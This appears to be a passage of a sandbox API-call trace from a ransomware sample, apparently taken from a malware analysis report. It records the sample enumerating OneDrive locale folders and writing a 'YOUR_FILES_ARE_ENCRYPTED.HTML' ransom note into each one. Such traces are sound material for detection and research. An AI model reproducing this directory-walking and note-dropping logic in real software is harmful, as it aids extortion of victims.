104 [0160.399] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\de\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\de\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0160.400] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.402] CloseHandle (hObject=0x5a8) returned 1 [0160.402] GetProcessHeap () returned 0x270000 [0160.403] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.403] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7d0cdf0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7eafd10, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7eafd10, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="el", cAlternateFileName="")) returned 1 [0160.403] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\el") returned 74 [0160.403] GetProcessHeap () returned 0x270000 [0160.403] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.403] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\el" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\el") 
returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\el" [0160.403] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\el", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\el\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\el\\*" [0160.403] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\el\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7d0cdf0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7eafd10, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7eafd10, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.404] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7d0cdf0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7eafd10, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7eafd10, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.404] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa7eafd10, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7eafd10, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7eafd10, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x144a0, 
dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.404] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\el\\FileSync.LocalizedResources.dll.mui") returned 110 [0160.404] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.404] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.404] lstrlenW (lpString=".mui") returned 4 [0160.404] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.404] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa7eafd10, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7eafd10, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7eafd10, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x144a0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.404] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.404] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\el\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0160.404] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\el\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\el\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 
dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0160.405] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.410] CloseHandle (hObject=0x5a8) returned 1 [0160.411] GetProcessHeap () returned 0x270000 [0160.411] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.412] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7eafd10, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8078d90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8078d90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="en", cAlternateFileName="")) returned 1 [0160.412] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en") returned 74 [0160.412] GetProcessHeap () returned 0x270000 [0160.412] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.412] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en" [0160.412] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en\\*") 
returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en\\*" [0160.412] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7eafd10, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8078d90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8078d90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.413] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7eafd10, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8078d90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8078d90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.413] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa8078d90, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8078d90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8078d90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x116a8, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.414] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en\\FileSync.LocalizedResources.dll.mui") 
returned 110 [0160.414] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.414] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.414] lstrlenW (lpString=".mui") returned 4 [0160.414] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.414] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa8078d90, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8078d90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8078d90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x116a8, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.414] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.414] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0160.414] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\en\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0160.415] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.417] CloseHandle (hObject=0x5a8) returned 1 [0160.418] 
GetProcessHeap () returned 0x270000 [0160.419] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.419] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8078d90, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8326650, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8326650, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="en-gb", cAlternateFileName="")) returned 1 [0160.419] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en-gb") returned 77 [0160.419] GetProcessHeap () returned 0x270000 [0160.419] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.419] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en-gb" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en-gb") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en-gb" [0160.419] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en-gb", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en-gb\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en-gb\\*" [0160.419] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en-gb\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8078d90, 
ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8326650, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8326650, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.421] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8078d90, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8326650, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8326650, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.421] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa8326650, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8326650, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8326650, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x118b0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.421] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en-gb\\FileSync.LocalizedResources.dll.mui") returned 113 [0160.421] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.421] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.421] lstrlenW (lpString=".mui") returned 4 [0160.421] PathFindExtensionW 
(pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.421] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa8326650, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8326650, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8326650, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x118b0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.421] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.421] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en-gb\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0160.421] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en-gb\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\en-gb\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0160.422] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.425] CloseHandle (hObject=0x5a8) returned 1 [0160.426] GetProcessHeap () returned 0x270000 [0160.426] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.426] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, 
ftCreationTime.dwLowDateTime=0xa8326650, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa84c9570, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa84c9570, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="es", cAlternateFileName="")) returned 1 [0160.427] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\es") returned 74 [0160.427] GetProcessHeap () returned 0x270000 [0160.427] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.427] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\es" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\es") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\es" [0160.427] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\es", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\es\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\es\\*" [0160.427] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\es\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8326650, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa84c9570, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa84c9570, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 
0x42f3280 [0160.428] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8326650, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa84c9570, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa84c9570, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.428] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa84c9570, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa84c9570, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa84c9570, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x130a8, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.428] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\es\\FileSync.LocalizedResources.dll.mui") returned 110 [0160.428] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.428] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.428] lstrlenW (lpString=".mui") returned 4 [0160.428] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.429] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa84c9570, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa84c9570, ftLastAccessTime.dwHighDateTime=0x1d709b9, 
ftLastWriteTime.dwLowDateTime=0xa84c9570, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x130a8, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.429] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.429] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\es\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0160.429] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\es\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\es\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0160.429] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.432] CloseHandle (hObject=0x5a8) returned 1 [0160.432] GetProcessHeap () returned 0x270000 [0160.433] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.433] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa84c9570, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa872ab70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa872ab70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="et", cAlternateFileName="")) returned 1 [0160.433] wnsprintfW (in: 
